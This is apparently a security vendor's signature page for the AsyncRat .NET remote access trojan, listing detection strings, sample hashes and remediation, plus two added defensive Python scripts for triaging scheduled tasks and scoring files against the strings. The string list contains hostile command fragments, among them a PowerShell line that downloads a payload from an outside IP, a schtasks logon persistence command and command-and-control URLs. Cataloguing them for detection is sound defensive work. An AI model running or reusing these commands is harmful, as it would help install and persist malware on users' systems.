Concrete signature match: type Backdoor (provides unauthorized remote access), platform MSIL (.NET, Microsoft Intermediate Language), family AsyncRat
Backdoor:MSIL/AsyncRat!atmn is a concrete detection of the AsyncRat Remote Access Trojan (RAT), an open-source .NET-based malware family. The strings below show the behaviours the signature keys on: persistence through the Software\Microsoft\Windows\CurrentVersion\Run registry key (stored both forwards and reversed) and a logon scheduled task created with schtasks at the highest run level; execution through living-off-the-land binaries such as MSBuild.exe, powershell.exe with ExecutionPolicy Bypass, mshta, rundll32 and regsvr32; TripleDES (TripleDESCryptoServiceProvider) for encrypting its communication; and HttpWebRequest calls to hardcoded download and command-and-control endpoints. Once installed it gives the operator data exfiltration and full remote control over the compromised system.
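The scheduled-task persistence described above (the signature's own strings are schtasks /create /f /sc onlogon /rl highest /tn and powershell.exe with ExecutionPolicy Bypass -File) leaves a task definition under C:\Windows\System32\Tasks, which can be reviewed offline or exported with schtasks /query /tn <name> /xml. The following is an added example, not code from this page or from the AsyncRat project: it parses a task's XML and flags the combination of a logon trigger, HighestAvailable run level and a script-host or LOLBin action. The task XML embedded below is constructed for the demo, and the set of suspect executables and user-writable path fragments are assumptions drawn from the binaries the page's strings name.

```python
"""Triage Scheduled Task XML for AsyncRat-style logon persistence.

Added example; not part of the signature page or the AsyncRat project.
Usage: python task_triage.py C:\\Windows\\System32\\Tasks\\<TaskName>
       (task files are UTF-16 with a BOM, so they are read as bytes)
"""
import sys
import xml.etree.ElementTree as ET

NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}

# Executables the page's strings name as execution vehicles (assumed list).
SUSPECT_BINARIES = {"powershell.exe", "msbuild.exe", "mshta.exe",
                    "rundll32.exe", "regsvr32.exe"}
# Path fragments a non-admin user can write to (assumed list; %Temp% is the
# one the page's download string uses).
USER_WRITABLE = ("%temp%", "\\temp\\", "\\appdata\\", "\\users\\public\\")


def analyze_task(xml_data):
    """Return trigger/privilege/action facts plus the reasons a task looks
    like the schtasks /sc onlogon /rl highest persistence the page describes."""
    root = ET.fromstring(xml_data)

    trig = root.find("t:Triggers", NS)
    triggers = [] if trig is None else [el.tag.split("}")[-1] for el in trig]

    run_level = root.findtext("t:Principals/t:Principal/t:RunLevel",
                              default="LeastPrivilege", namespaces=NS)

    actions = []
    for ex in root.findall("t:Actions/t:Exec", NS):
        cmd = ex.findtext("t:Command", default="", namespaces=NS).strip()
        args = ex.findtext("t:Arguments", default="", namespaces=NS).strip()
        actions.append((cmd, args))

    reasons = []
    if "LogonTrigger" in triggers:
        reasons.append("logon trigger (schtasks /sc onlogon)")
    if run_level == "HighestAvailable":
        reasons.append("runs elevated (schtasks /rl highest)")
    execution_flags = 0
    for cmd, args in actions:
        exe = cmd.strip('"').lower().replace("/", "\\").rsplit("\\", 1)[-1]
        if exe in SUSPECT_BINARIES:
            reasons.append(f"action launches {exe}")
            execution_flags += 1
        if "executionpolicy bypass" in args.lower():
            reasons.append("ExecutionPolicy Bypass in arguments")
            execution_flags += 1
        if any(p in f"{cmd} {args}".lower() for p in USER_WRITABLE):
            reasons.append("payload lives in a user-writable path")
            execution_flags += 1

    return {
        "triggers": triggers,
        "run_level": run_level,
        "actions": actions,
        "reasons": reasons,
        # A logon trigger alone is normal; it is the pairing with a script
        # host / LOLBin or a user-writable payload that is suspect.
        "suspicious": "LogonTrigger" in triggers and execution_flags > 0,
    }


# Constructed task definitions for the demo (not recovered from a real host).
SUSPECT_TASK = r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers>
    <LogonTrigger><Enabled>true</Enabled></LogonTrigger>
  </Triggers>
  <Principals>
    <Principal id="Author"><RunLevel>HighestAvailable</RunLevel></Principal>
  </Principals>
  <Actions Context="Author">
    <Exec>
      <Command>powershell.exe</Command>
      <Arguments>-ExecutionPolicy Bypass -File C:\Users\Public\update.ps1</Arguments>
    </Exec>
  </Actions>
</Task>"""

BENIGN_TASK = r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers>
    <CalendarTrigger><StartBoundary>2024-01-01T09:00:00</StartBoundary></CalendarTrigger>
  </Triggers>
  <Principals>
    <Principal id="Author"><RunLevel>LeastPrivilege</RunLevel></Principal>
  </Principals>
  <Actions Context="Author">
    <Exec>
      <Command>C:\Program Files\Vendor\updater.exe</Command>
      <Arguments>/silent</Arguments>
    </Exec>
  </Actions>
</Task>"""


if __name__ == "__main__":
    if len(sys.argv) > 1:
        with open(sys.argv[1], "rb") as fh:  # bytes so ET honours the UTF-16 BOM
            result = analyze_task(fh.read())
    else:
        result = analyze_task(SUSPECT_TASK)
    for key, value in result.items():
        print(f"{key}: {value}")
```

Run it over every file under C:\Windows\System32\Tasks (recursively, since the tree is nested by folder) and review anything reported as suspicious together with the Run key entries; the task name itself is the file name, not part of the XML.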
Relevant strings associated with this threat:
- Set ZpXcmsCQ = CreateObject("Wscript.Shell") (MACROHSTR_EXT)
- ZpXcmsCQ.Run rdeAjnshv + lqfadUMW + AKrDsxioC, RValue (MACROHSTR_EXT)
- Set fso = CreateObject("Scripting.FileSystemObject") (PEHSTR_EXT)
- & "\ (PEHSTR_EXT)
- .xml" (PEHSTR_EXT)
- Set object_Shell = CreateObject("Shell.Application") (PEHSTR_EXT)
- object_Shell.ShellExecute "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe", (PEHSTR_EXT)
- COM Surrogate (PEHSTR_EXT)
- trevnoC.metsyS (PEHSTR_EXT)
- CompressionMode (PEHSTR_EXT)
- TripleDESCryptoServiceProvider (PEHSTR_EXT)
- https://ufile.io/rftaeqtc (PEHSTR_EXT)
- Software\Microsoft\Windows\CurrentVersion\Run (PEHSTR_EXT)
- http://serverupdates48.ga/test (PEHSTR_EXT)
- HttpWebRequest (PEHSTR_EXT)
- CarRentalSystem\obj\Debug\Dash.pdb (PEHSTR_EXT)
- crypted.exe (PEHSTR_EXT)
- sqkpikos.pdb (PEHSTR_EXT)
- HCS Computers & Laptops (PEHSTR_EXT)
- Client.Install (PEHSTR_EXT)
- GetExecutingAssembly (PEHSTR_EXT)
- System.Windows.Forms (PEHSTR_EXT)
- System.Reflection (PEHSTR_EXT)
- B.text (PEHSTR_EXT)
- setUTCMinutesTU Jurassic.Library.JSFunctionFlags (PEHSTR_EXT)
- calc_pro.Form1.resources (PEHSTR_EXT)
- payload.exe (PEHSTR_EXT)
- get_Computer (PEHSTR_EXT)
- Dotfuscated\windwos.pdb (PEHSTR_EXT)
- windwos.My (PEHSTR_EXT)
- 134.122.133.49 (PEHSTR_EXT)
- Client.bin (PEHSTR_EXT)
- Select * From Win32_ComputerSystem (PEHSTR_EXT)
- Dotfuscated\CryptoObfuscator_Output\v4.pdb (PEHSTR_EXT)
- v4.Resources.resources (PEHSTR_EXT)
- windwos.pdb (PEHSTR_EXT)
- petrolmanagementsystem.Supplier_withdraw_pump_bank_detail.resources (PEHSTR_EXT)
- \x64\Release\WechatAnd.pdb (PEHSTR_EXT)
- windwos\bin\Debug\Dotfuscated\windwos.pdb (PEHSTR_EXT)
- server.Resources.resources (PEHSTR_EXT)
- RAT\AsyncRat_0313\rat_Client\rat_pro\obj\Debug\rat_pro.pdb (PEHSTR_EXT)
- 9ubmFjIG1hcmdvcnAgc2loVCHNTAG4Ic (PEHSTR_EXT)
- set_UseShellExecute (PEHSTR_EXT)
- \RatClientTest.pdb (PEHSTR)
- Ymcfcbdts.Properties (PEHSTR_EXT)
- Stub.g.resources (PEHSTR)
- RunHiddenCommand (PEHSTR)
- RawAccel.exe (PEHSTR)
- seftali\x64\Release\seftali.pdb (PEHSTR_EXT)
- loader\x64\Release\Espio.pdb (PEHSTR_EXT)
- powershell(new-object System.Net.WebClient).DownloadFile('http://149.88.66.68/test.mp3','%Temp%/test.bin') (PEHSTR_EXT)
- schtasks /create /f /sc onlogon /rl highest /tn (PEHSTR_EXT)
- Stub.exe (PEHSTR_EXT)
- nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS (PEHSTR_EXT)
- Skipping Annabelle.exe (PEHSTR_EXT)
- powershell.exe (PEHSTR_EXT)
- ExecutionPolicy Bypass -File (PEHSTR_EXT)
- !#HSTR:StringCodeForMshta.A!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForHooking.C!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForHooking.D!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForHooking.L!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForHooking.O!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForRegsvr32.A!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForRundll32.A!pli (PEHSTR_EXT)
- rundll32 (PEHSTR_EXT)
- !#HSTR:StringCodeForBITSJobs.A!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForPowerShell.G!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForScheduledTask.A!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForDataEncoding.D!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForHooking.J!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForHooking.K!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForRemoteFileCopy.B!pli (PEHSTR_EXT)
- !#HSTR:ExecutionGuardrails (PEHSTR_EXT)
- !#HSTR:StringCodeForFileDeletion.A!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForHooking.M!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForNetshHelperDLL.A!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForRemoteServices.A!pli (PEHSTR_EXT)
Sample hashes (SHA-256) associated with this threat:
- cd4dad081f725dfbfb7a953be2d375e642cb70b31c657855f6acb0b6f1cb0a4f
- ab04fc3cbe5aa5f61e603328969673d027d82a27a5958f669893bb8f3cf66cba
- 6d7d65abe6b704d342f890c901fbfbdfd1306c3ff9a7395d780743322ed2211c
- 5c986bec02b7db3e84afddbd548832630870da9966bbd3062ced1f2e8a2efd31
- 477c09a67603a4b499b7c20cdbff58f33522dc86dac5af5fb6688daae57fbc05
Remediation: Immediately isolate the infected system from the network. Perform a full system scan with up-to-date antivirus software and remove all detected malicious files. Because the signature's strings show persistence through the Run registry key and a logon scheduled task created at the highest run level, check both (HKCU and HKLM Software\Microsoft\Windows\CurrentVersion\Run, and the Task Scheduler library) for entries that launch MSBuild.exe, powershell.exe or binaries in user-writable paths, and look for signs of lateral movement. The RAT gives its operator full remote control, so treat every credential used on the host as exposed and reset all user credentials associated with the compromised system.
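The string list above is the raw material of an HSTR-style content signature: each string is an indicator, and a sample is flagged when enough of them co-occur. The following is an added example, not the signature's own logic or the vendor's engine: a small scanner that searches a file for a subset of those strings in the encodings a .NET binary actually stores them in (UTF-16LE for string literals in the #US metadata heap, ASCII for PDB paths and embedded commands), also tries each string reversed because the page's samples store some literals that way (trevnoC.metsyS, nuR\noisreVtnerruC\...), and scores the hits against a threshold. The weights, the threshold and the test blob are constructed assumptions; the real signature's weights are not published.

```python
"""HSTR-style weighted string triage for suspected AsyncRat samples.

Added example; not the signature's logic or the vendor's engine.
Usage: python hstr_triage.py <file>   (no argument scans a constructed blob)
"""
import sys

# Subset of the page's PEHSTR strings. Weights and threshold are assumed
# for the demo; the real signature's weights are not published.
INDICATORS = {
    "TripleDESCryptoServiceProvider": 2,
    "Software\\Microsoft\\Windows\\CurrentVersion\\Run": 2,
    "schtasks /create /f /sc onlogon /rl highest /tn": 3,
    "MSBuild.exe": 2,
    "ExecutionPolicy Bypass -File": 2,
    "Client.Install": 3,
    "rat_Client\\rat_pro\\obj\\Debug\\rat_pro.pdb": 5,
    "System.Convert": 1,   # the page lists it reversed: trevnoC.metsyS
}
THRESHOLD = 6


def variants(text):
    """Yield (label, pattern) for each encoding worth searching.

    .NET string literals sit in the #US metadata heap as UTF-16LE, so an
    ASCII-only `strings` pass misses most of them; PDB paths and embedded
    commands are ASCII. The reversed form is searched too, since the page's
    samples store some literals backwards, and a reversed hit is itself a
    small evasion tell.
    """
    for candidate, tag in ((text, ""), (text[::-1], "reversed ")):
        yield tag + "ascii", candidate.encode("ascii")
        yield tag + "utf-16le", candidate.encode("utf-16-le")


def scan(blob):
    """Map each indicator to the list of encodings it was found in."""
    hits = {}
    for indicator in INDICATORS:
        found = [label for label, pat in variants(indicator) if pat in blob]
        if found:
            hits[indicator] = found
    return hits


def score(hits):
    # Each indicator counts once no matter how many encodings matched.
    return sum(INDICATORS[i] for i in hits)


def verdict(blob):
    hits = scan(blob)
    total = score(hits)
    return total, total >= THRESHOLD, hits


def build_sample():
    """Constructed stand-in for a suspicious .NET binary (not a real sample)."""
    return b"".join([
        b"MZ\x90\x00" + b"\x00" * 60,
        "TripleDESCryptoServiceProvider".encode("utf-16-le"),
        "Client.Install".encode("utf-16-le"),
        "trevnoC.metsyS".encode("utf-16-le"),   # reversed System.Convert
        b"\x00" * 16,
        b"schtasks /create /f /sc onlogon /rl highest /tn ",
    ])


# Constructed benign-looking blob: a build-tool reference and a framework
# type on their own stay under the threshold.
BENIGN = b"MZ" + "MSBuild.exe".encode("utf-16-le") + b"System.Convert"


if __name__ == "__main__":
    if len(sys.argv) > 1:
        with open(sys.argv[1], "rb") as fh:
            data = fh.read()
    else:
        data = build_sample()
    total, flagged, hits = verdict(data)
    for indicator, labels in hits.items():
        print(f"{INDICATORS[indicator]:>2}  {indicator!r}  [{', '.join(labels)}]")
    print(f"score {total} / threshold {THRESHOLD}: {'FLAG' if flagged else 'clean'}")
```

The scoring, not any single string, is the point: MSBuild.exe or System.Convert alone appear in plenty of legitimate .NET software, whereas the combination with a reversed framework name, a TripleDES provider and a schtasks onlogon command line is what the signature family is built to catch.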